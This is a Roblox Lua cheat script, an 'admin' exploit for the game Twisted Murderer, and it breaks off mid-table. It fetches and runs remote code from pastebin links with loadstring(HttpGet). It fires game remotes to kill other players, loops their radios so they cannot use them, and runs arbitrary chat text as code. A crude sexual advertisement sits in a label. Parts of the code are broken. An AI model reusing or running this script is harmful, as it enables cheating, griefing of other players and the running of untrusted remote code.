local LoadingScreen = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel1 = Instance.new("TextLabel")
local chevron_right = Instance.new("ImageButton")
local chevron_left = Instance.new("ImageButton")
local Frame_2 = Instance.new("ImageButton")
local MadeBy = Instance.new("TextLabel")
local Frame1 = Instance.new("ImageButton")
local Tclose = Instance.new("TextLabel")
 
LoadingScreen.Name = "LoadingScreen"
LoadingScreen.Parent = game.CoreGui

Frame.Parent = LoadingScreen
Frame.BackgroundColor3 = Color3.new(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Size = UDim2.new(1, 1, 1, 1)

TextLabel1.Name = "TextLabel1"
TextLabel1.Parent = Frame
TextLabel1.Active = true
TextLabel1.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
TextLabel1.BackgroundTransparency = 0.69999998807907
TextLabel1.BorderSizePixel = 0
TextLabel1.Position = UDim2.new(-0.00158275664, 0, -0.00124290586, 0)
TextLabel1.Size = UDim2.new(1, 1, 1, 1)
TextLabel1.Font = Enum.Font.Gotham
TextLabel1.Text = "Loading.."
TextLabel1.TextColor3 = Color3.new(1, 1, 1)
TextLabel1.TextSize = 30
TextLabel1.TextWrapped = true

chevron_right.Name = "chevron_right"
chevron_right.Parent = TextLabel1
chevron_right.BackgroundTransparency = 1
chevron_right.Position = UDim2.new(0.439100534, 0, 0.480620146, 0)
chevron_right.Size = UDim2.new(0, 25, 0, 25)
chevron_right.ZIndex = 2
chevron_right.Image = "rbxassetid://3926305904"
chevron_right.ImageRectOffset = Vector2.new(924, 884)
chevron_right.ImageRectSize = Vector2.new(36, 36)

chevron_left.Name = "chevron_left"
chevron_left.Parent = TextLabel1
chevron_left.BackgroundTransparency = 1
chevron_left.Position = UDim2.new(0.545283854, 0, 0.480620146, 0)
chevron_left.Size = UDim2.new(0, 25, 0, 25)
chevron_left.ZIndex = 2
chevron_left.Image = "rbxassetid://3926305904"
chevron_left.ImageRectOffset = Vector2.new(124, 924)
chevron_left.ImageRectSize = Vector2.new(36, 36)

Frame_2.Name = "Frame"
Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255)
Frame_2.BackgroundTransparency = 1
Frame_2.Position = UDim2.new(0.313749999, 0, 0.254658371, 0)
Frame_2.Size = UDim2.new(0, 596, 0, 64)
Frame_2.Image = "rbxassetid://2790371148"
Frame_2.ImageColor3 = Color3.new(0.137255, 0.137255, 0.137255)
Frame_2.ScaleType = Enum.ScaleType.Slice
Frame_2.SliceCenter = Rect.new(32, 32, 224, 224)

MadeBy.Name = "MadeBy"
MadeBy.Parent = Frame_2
MadeBy.BackgroundColor3 = Color3.new(1, 1, 1)
MadeBy.BackgroundTransparency = 1
MadeBy.Position = UDim2.new(0.0402684547, 0, 0.109375, 0)
MadeBy.Size = UDim2.new(0, 548, 0, 50)
MadeBy.Font = Enum.Font.SourceSans
MadeBy.Text = "Script made by uek#6000 and Cliqqaphonk#3346 [Go buy XVA for hot goth girls w big tits ;) ]"
MadeBy.TextColor3 = Color3.new(1, 1, 0.498039)
MadeBy.TextSize = 24
MadeBy.TextWrapped = true

Frame1.Name = "Frame1"
Frame1.Parent = Frame
Frame1.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255)
Frame1.BackgroundTransparency = 1
Frame1.Position = UDim2.new(0.312500775, 0, 0.634503365, 0)
Frame1.Size = UDim2.new(0, 596, 0, 64)
Frame1.Visible = false
Frame1.Image = "rbxassetid://2790371148"
Frame1.ImageColor3 = Color3.new(0.137255, 0.137255, 0.137255)
Frame1.ScaleType = Enum.ScaleType.Slice
Frame1.SliceCenter = Rect.new(32, 32, 224, 224)

Tclose.Name = "Tclose"
Tclose.Parent = Frame1
Tclose.BackgroundColor3 = Color3.new(1, 1, 1)
Tclose.BackgroundTransparency = 1
Tclose.Position = UDim2.new(0.0402684547, 0, 0.109375, 0)
Tclose.Size = UDim2.new(0, 548, 0, 50)
Tclose.Font = Enum.Font.SourceSans
Tclose.Text = "Press T to close."
Tclose.TextColor3 = Color3.new(1, 1, 0.498039)
Tclose.TextSize = 24
Tclose.TextWrapped = true


    loadstring(game:HttpGet(('https://pastebin.com/raw/XHLUdbHF'),true))()
wait()
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("", Color3.new(0,255,0))
_G.SendTMMessage("[Xi$tence]: Welcome to Xi$tences Twisted Murderer Admin!", Color3.new(0,55,120))
wait(.5)
_G.SendTMMessage("[Xi$tence]: If you have any questions, dm me on discord Cliqqaphonk#0015", Color3.new(0,55,120))

for i = 1, 1, 1 do
TextLabel1.Text = 'Loading'
wait(1)
TextLabel1.Text = 'Loading.'
wait(1)
TextLabel1.Text = 'Loading..'
wait(1)
TextLabel1.Text = 'Loading...'
wait(1)
TextLabel1.Text = 'Loaded!'
wait(1)
TextLabel1.Text = 'Enjoy!'
end

Frame1.Visible = true
Tclose.Visible = true

local mouse = game.Players.LocalPlayer:GetMouse()
mouse.KeyDown:connect(function(t)	
	if t == "t" then	
LoadingScreen:Destroy()
end
	end)


game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 0)



local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("fly") then
loadstring(game:HttpGet(('https://pastebin.com/raw/6KVugL85'),true))()
   _G.SendTMMessage("[XI$TENCE]: Flying Mode Enabled!", Color3.new(0,55,120))
	end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("nrgun") then
loadstring(game:HttpGet(('https://pastebin.com/raw/2Y86cbTL'),true))()
_G.SendTMMessage("[XI$TENCE]: No cooldown/reload gun/knife Given!", Color3.new(0,55,120))
	end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("illum") then
		loadstring(game:HttpGet(('https://pastebin.com/raw/8Ag2jaCD'),true))()
		_G.SendTMMessage("[XI$TENCE]: Illuminati Knife Given!", Color3.new(0,55,120))
	end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("yt") then
		loadstring(game:HttpGet(('https://pastebin.com/raw/UdRBM7rB'),true))()
		_G.SendTMMessage("[XI$TENCE]: Youtuber Knife Given!", Color3.new(0,55,120))
	end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("quick") then
		loadstring(game:HttpGet(('https://pastebin.com/raw/Sn1SsSCi'),true))()
		_G.SendTMMessage("[XI$TENCE]: Quickscoper Knife Given!", Color3.new(0,55,120))
	end
end)

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("laser") then
loadstring(game:HttpGet(('https://pastebin.com/raw/aavyXdmC'),true))()
_G.SendTMMessage("[XI$TENCE]: Laser Knife Given!", Color3.new(0,55,120))
  end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("shiftlock") then
		game:GetService('Players').LocalPlayer.DevEnableMouseLock = true
		_G.SendTMMessage("[XI$TENCE]: ShiftLock Enabled!", Color3.new(0,55,120))
	end
end)
local Player = game.Players.LocalPlayer
Player.Chatted:connect(function(cht)
    if cht:match("kill") then
    local player = nil
    game.ReplicatedStorage.Event:FireServer("TPD", v.Character.Humanoid.Health, v.Character.Humanoid)
    _G.SendTMMessage("[XI$TENCE]: Player Killed!", Color3.new(0,55,120))
                            end
                        end)

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("rejoin") then
    _G.SendTMMessage("[XI$TENCE]: Rejoining, please wait!", Color3.new(0,55,120))
game:GetService('TeleportService'):Teleport(177052655, game.Players.LocalPlayer)
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("knives") then 
wait(0.2)
 for count = 1, 1, 2 do
_G.SendTMMessage("[XI$TENCE]: Choose Your Knife! [Illum, Quick, Yt, Laser, Nrgun", Color3.new(0,55,120))
end
 end
end)

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("rban") then 
wait(0.2)
 for count = 1, 1, 2 do
_G.SendTMMessage("[XI$TENCE]: Player RadioBanned!", Color3.new(0,55,120))
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("noclip") then 
wait(0.2)
 for count = 1, 1, 2 do
 print('')
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("noclip") then 
wait(0.2)
local h,char,play
play = game.Players.LocalPlayer
local uis = game:getService("UserInputService")
game:getService("RunService"):BindToRenderStep("",0,function()
    char = play.Character
    if char then h = char:findFirstChildOfClass("Humanoid") end
    if not h then return end
    if uis:IsKeyDown(Enum.KeyCode.V) then
        h:ChangeState(11)
	_G.SendTMMessage("[XI$TENCE]: Noclip Enabled!", Color3.new(0,55,120))
    end
end)
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("cmds") then
wait(0.3)
 for count = 1, 1, 2 do
 _G.SendTMMessage("[XI$TENCE]: Commands Printed In Console (F9)!", Color3.new(0,55,120))
print[[ 

--------MOVEMENT-------
--fast
--slow
--fly
--------MOVEMENT-------
--------ABUSIVE----------
--knives
--nrgun
--illum
--quick
--yt
--laser
--kill
--------ABUSE----------
---------MISC----------
--creds
--creator
---------MISC----------
]]
end
 end  
end) 

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("illum") then 
wait(0.2)
 for count = 1, 1, 2 do
print('')
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("laser") then 
wait(.2)
 for count = 1, 1, 2 do
print('')
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("quick") then 
wait(0.2)
 for count = 1, 1, 2 do
print('')
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("yt") then 
wait(0.2)
 for count = 1, 1, 2 do
print('')
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("fast") then 
wait(0.2)
 for count = 1, 1, 2 do
_G.SendTMMessage("[XI$TENCE]: You Are Now Faster!", Color3.new(0,55,120))
end
 end
end)
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("slow") then 
wait(0.2)
 for count = 1, 1, 2 do
_G.SendTMMessage("[XI$TENCE]: You Are Now Slower!", Color3.new(0,55,120))
end
 end
end)

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("creator") then
wait(0.2)
for count = 1, 1, 2 do
game.Players:Chat('[Xi$tence] | Script Made By CliqqaphonkOO15')
end       
 end  
end)                                                                                                                             
local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("dis") then
wait(0.2)
for count = 1, 1, 2 do
game.Players:Chat('[Xi$tence] | CliqqaphonkOO15')
end       
 end  
end)

local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("creds") then
wait(0.2)
for count = 1, 1, 2 do
game.Players:Chat('[Xi$tence] | Credits to gIockvert for helping with the script.')
end       
 end  
end)


local Player = game.Players.LocalPlayer

Player.Chatted:connect(function(cht)
    if cht:match("cmds") then


    end
end)
local remote = Game["ReplicatedStorage"]["DefaultChatSystemChatEvents"]["SayMessageRequest"]
    local args = {
        [1] = "",
        [2] = "All"
    }
    remote:FireServer(unpack(args))
wait(1)
local remote = Game["ReplicatedStorage"]["DefaultChatSystemChatEvents"]["SayMessageRequest"]
    local args = {
        [1] = "",
        [2] = "All"
    }
wait(2)
	local remote = Game["ReplicatedStorage"]["DefaultChatSystemChatEvents"]["SayMessageRequest"]
    local args = {
        [1] = "",
        [2] = "All"
    }
    remote:FireServer(unpack(args))
wait(1)	
	local remote = Game["ReplicatedStorage"]["DefaultChatSystemChatEvents"]["SayMessageRequest"]
    local args = {
        [1] = "",
        [2] = "All"
    }
    remote:FireServer(unpack(args))
wait(1)	
	local remote = Game["ReplicatedStorage"]["DefaultChatSystemChatEvents"]["SayMessageRequest"]
    local args = {
        [1] = "",
        [2] = "All"
    }
    remote:FireServer(unpack(args))

   local gPlayers = game:GetService("Players")
    local admin = gPlayers.LocalPlayer.Name
    local bannedplyrs = {'..',''}

    local admins = {'name, othername'} -- names here of people who have access to your commands! (Your name doesn't need to be in here.)

    -- declare services / init stuff --

    local services={}
    local cmds={}
    local std={}

    local serverLocked = false

    function FIX_LIGHTING()
    game.Lighting.Ambient = Color3.new(0.5, 0.5, 0.5)
    game.Lighting.Brightness = 1
    game.Lighting.GlobalShadows = true
    game.Lighting.Outlines = false
    game.Lighting.TimeOfDay = 14
    game.Lighting.FogEnd = 100000
    end

    services.players=gPlayers
    services.lighting=game:GetService('Lighting')
    services.workspace=game:GetService('Workspace')
    services.events = {}
    local user = gPlayers.LocalPlayer

    local cmdprefix    = ''
    local scriptprefix = '/'
    local split        = " "


    updateevents=function()
    for i,v in pairs(services.events) do services.events:remove(i) v:disconnect() end
    for i,v in pairs(gPlayers:players())do
    local ev = v.Chatted:connect(function(msg) do_exec(msg,v) end)
    services.events[#services.events+1] = ev
    end
    end

    std.inTable=function(tbl,val)
    if tbl==nil then return false end

    for _,v in pairs(tbl)do
    if v==val then return true end
    end 
    return false
    end

    std.out=function(str)
    print(str)
    end

    std.list=function(tbl) --turns table into list with commas
    local str=''
    for i,v in pairs(tbl)do
    str=str..tostring(v)
    if i~=#tbl then str=str..', ' end
    end 
    return str
    end

    std.endat=function(str,val)
    local z=str:find(val)
    if z then 
    return str:sub(0,z-string.len(val)),true
    else 
    return str,false 
    end
    end

    std.first=function(str) return str:sub(1,1) end

    isAdmin=function(name)
    if name==admin then
    return true
    elseif admins[name]==true then
    return true
    end
    return false
    end

    gPlayers.PlayerAdded:connect(function(player)
    for i,v in pairs(bannedplyrs) do
    game.ReplicatedStorage.Event:FireServer("TPD", 2000, gPlayers[v].Character.Humanoid)
    end
    end)

    local exec=function(str)
    spawn(function()
    local script, loaderr = loadstring(str)
    if not script then
    error(loaderr)
    else
    script()
    end
    end)
    end

    local findCmd=function(cmd_name)
    for i,v in pairs(cmds)do
    if v.NAME:lower()==cmd_name:lower() or std.inTable(v.ALIAS,cmd_name:lower())then
    return v
    end
    end
    end

    local getCmd=function(msg)
    local cmd,hassplit=std.endat(msg:lower(),split)
    if hassplit then 
    return {cmd,true} 
    else 
    return {cmd,false}
    end
    end

    local getprfx=function(strn)
    if strn:sub(1,string.len(cmdprefix))==cmdprefix then return{'cmd',string.len(cmdprefix)+1}
    elseif strn:sub(1,string.len(scriptprefix))==scriptprefix then return{'exec',string.len(scriptprefix)+1}
    end return
    end

    local getArgs=function(str)
    local args={}
    local new_arg=nil
    local hassplit=nil
    local s=str
    repeat
    new_arg,hassplit=std.endat(s:lower(),split)
    if new_arg~='' then
    args[#args+1]=new_arg
    s=s:sub(string.len(new_arg)+string.len(split)+1)
    end
    until hassplit==false
    return args
    end

    local function execCmd(str, plr)
    local s_cmd
    local a
    local cmd
    s_cmd = getCmd(str) --separate command from string using split {command name,arg bool (for arg system)}
    cmd = findCmd(s_cmd[1]) --get command object {NAME,DESC,{ALIASES},function(args)}
    if cmd == nil then return end
    a = str:sub(string.len(s_cmd[1]) + string.len(split) + 1)--start string "a" after command and split
    local args=getArgs(a)--gets us a nice table of arguments

    pcall(function()
    cmd.FUNC(args, plr)
    end)
    end

    function do_exec(str,plr)
    if not isAdmin(plr.Name)then return end 

    str=str:gsub('/e ','')--remove "/e " the easy way!

    local t=getprfx(str)
    if t==nil then return end
    str=str:sub(t[2])
    if t[1]=='exec' then
    exec(str)
    elseif t[1]=='cmd' then
    execCmd(str, plr)
    end
    end

    updateevents()
    _G.exec_cmd = execCmd
    --game.Players.LocalPlayer.Chatted:connect(doexec)

    local _char=function(plr_name)
    for i,v in pairs(game.Players:GetChildren())do
    if v:IsA'Player'then
    if v.Name==plr_name then return v.Character end
    end
    end
    return
    end

    local _plr=function(plr_name)
    for i,v in pairs(game.Players:GetChildren())do
    if v:IsA'Player'then
    if v.Name==plr_name then return v end
    end
    end
    return
    end

    function addcmd(name,desc,alias,func)
    cmds[#cmds+1]=
    {
    NAME=name;
    DESC=desc;
    ALIAS=alias;
    FUNC=func;
    }
    end

    local function getPlayer(name)
    local nameTable = {}
    name=name:lower()
    if name == "me" then
    return {admin}
    elseif name == "others" then
    for i,v in pairs(gPlayers:GetChildren()) do
    if v:IsA'Player'then
    if v.Name~=admin then
    nameTable[#nameTable+1]=v.Name
    end
    end
    end
    elseif name == "all" then
    for i,v in pairs(gPlayers:GetChildren()) do
    if v:IsA'Player'then 
    nameTable[#nameTable+1]=v.Name
    end
    end
    else
    for i,v in pairs(gPlayers:GetChildren()) do
    local lname = v.Name:lower()
    local i,j = lname:find(name)
    if i == 1 then
    return {v.Name}
    end
    end
    end
    return nameTable
    end

    -- commands --

    addcmd('play','Play music',{},
    function(args)
    local players=getPlayer(args[1])
    if not args[1]or not args[2]then return end
    local num=args[2]
    for i,v in pairs(players) do
    game.ReplicatedStorage.Event:FireServer("PlayRadio", gPlayers[v], num)
    end
    end)

  addcmd('radio','Play music',{},
    function(args)
    local players=getPlayer(args[1])
    if not args[1]or not args[2]then return end
    local num=args[2]
    for i,v in pairs(players) do
    game.ReplicatedStorage.Event:FireServer("PlayRadio", gPlayers[v], num)
    end
    end)

    addcmd('r','Play music',{},
    function(args)
    local players=getPlayer(args[1])
    if not args[1]or not args[2]then return end
    local num=args[2]
    for i,v in pairs(players) do
    game.ReplicatedStorage.Event:FireServer("PlayRadio", gPlayers[v], num)
    end
    end)

  addcmd('p','Play music',{},
    function(args)
    local players=getPlayer(args[1])
    if not args[1]or not args[2]then return end
    local num=args[2]
    for i,v in pairs(players) do
    game.ReplicatedStorage.Event:FireServer("PlayRadio", gPlayers[v], num)
    end
    end)


addcmd('tp','goto a player',{},
    function(args)
    local players=getPlayer(args[1])
    if players ~= nil and _char(players[1]):FindFirstChild("HumanoidRootPart") then
    _char(admin).HumanoidRootPart.CFrame = _char(players[1]).HumanoidRootPart.CFrame
    end
    end)

addcmd('to','goto a player',{},
    function(args)
    local players=getPlayer(args[1])
    if players ~= nil and _char(players[1]):FindFirstChild("HumanoidRootPart") then
    _char(admin).HumanoidRootPart.CFrame = _char(players[1]).HumanoidRootPart.CFrame
    end
    end)

addcmd('goto','goto a player',{},
    function(args)
    local players=getPlayer(args[1])
    if players ~= nil and _char(players[1]):FindFirstChild("HumanoidRootPart") then
    _char(admin).HumanoidRootPart.CFrame = _char(players[1]).HumanoidRootPart.CFrame
    end
    end)

    addcmd('rban','bans a player from using their radio',{},
    function(args)
    local players=getPlayer(args[1])
    for i,v in pairs(players)do
    while true do
    game.ReplicatedStorage.Event:FireServer("PlayRadio", gPlayers[v], 0)
    wait(0.1)
    end
    end
    end)

local Players = game:GetService("Players")
local Player = Players.LocalPlayer
local Mouse = Player:GetMouse()
local Crashed = false
local AntiHak = false
local Innos = {}
local Murds = {}
local Sherr = {}
local Lobby = {}
local LKill = {}
local ClickEnabled = false
local ClickMethod = ""

local function GetPlayerFromShortName(ShortName)
	local Plr = nil
	for i, v in ipairs(game.Players:GetPlayers()) do
		if string.find(string.lower(v.Name),string.lower(ShortName)) ~= nil then
			Plr = v
		end
	end
	return Plr
end

local LateCmds = {
	SingleCommands = {
		runyomouth = {
			Text = "r runyomouth",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by ml_em]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4219569851)
				end
			end
		},
		tommywright = {
			Text = "r tommyw",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by coratic]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4108678844)
				end
			end
		},
		FaceSlasha = {
			Text = "r fbeat",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by FaceSlasha]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3065884817)
				end
			end
        },
         goredemonskidtrash = {
			Text = "r kidr",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4064833214)
				end
			end
		},--4086723996
                hyperVLC = {
			Text = "r hyperV",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by CorruptName]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4086723996)
				end
			end  
                },
         illfinishwhatustarted = {
			Text = "r hhh",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Vortexturize]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4267227336)
				end
			end    
        },
        supra = {
			Text = "r supra",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by sadcoffins]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 2499265839)
				end
			end 

        },
        johndoe = {
			Text = "r john",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by //UNKNOWN//]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 2280876532) 
				end
			end
         		},  
        goredemonsflex = {
          Text = "r flex",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3805711045)
				end
			end
        },
        mafia3 = {
			Text = "r ins",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3728461656) 
				end
			end
         },  
        dooumshop = {
            Text = "r mym",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by x1mv]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4180820228) --done
				end
			end
         },
          yeah = {
        Text = "r cowbell",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by jimnnine]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3353217023)
				end
			end
         },
         dfadf = {
        Text = "r cowbell2",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Loksws]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4305174072)
				end
			end
         },
         dgfdfgdf = {
        Text = "r random",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Gwoo]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4086462197)
				end
			end
         },
         gdagadg = {
        Text = "r cowbell3",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GlxckMxne]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4298182850)
				end
			end
         },
         ytktyktyk = {
        Text = "r cute",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Gwoo]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4323543590)
				end
			end
         },
         bvcbcvb = {
        Text = "r demon",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by DemxnVibezAlt]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4141242040)
				end
			end
         },
         cvbx = {
        Text = "r cowbell4",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by symphamane AKA 7FpsGod]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3329654657)
				end
			end
         },
         cvfbx = {
        Text = "r cowbell5",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by 1c7y]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3980731564)
				end
			end
         },
         cvfgfdbx = {
        Text = "r phn",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by agramane]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 2791247295)
				end
			end
         },
         cvfzxcbx = {
        Text = "r doom1",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by seatownc]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 1290714953)
				end
			end
         },
         cvasdfbx = {
        Text = "r doom2",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
    _G.SendTMMessage("[XI$TENCE]: [Made by agramane]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 2665769435)
				end
			end
         },
         cvfdsfbx = {
        Text = "r warlord",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by BLOODYDEMVNS]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3124425349)
				end
			end
         },
         cvfdsffbx = { 
        Text = "r doomshop3",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Yvrpp]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4110415876)
				end
			end
         },
         cvfdsffbxx = { 
        Text = "r doom3",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by zerxmane]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3259191702)
				end
			end
         },
          cvfdffbxx = { 
         Text = "r doom4",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3932838600)
				end
			end
         },
          cvfbxx = { 
         Text = "r doom5",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by addictions666]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4386448963 )
				end
			end
         },
          cvfbxu = { 
         Text = "r rdoom",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by matthew2623]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4382001253)
				end
			end
         },
          FUCKYOURKIDNESS = { 
         Text = "r Fyk",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by 1c7y]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4357250648)
				end
			end
         },
          cowbellhell1sh = { 
         Text = "r hell",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by heII_ish]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3222886494)
				end
			end
         },
          russiandoom = { 
         Text = "r rdoom2",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
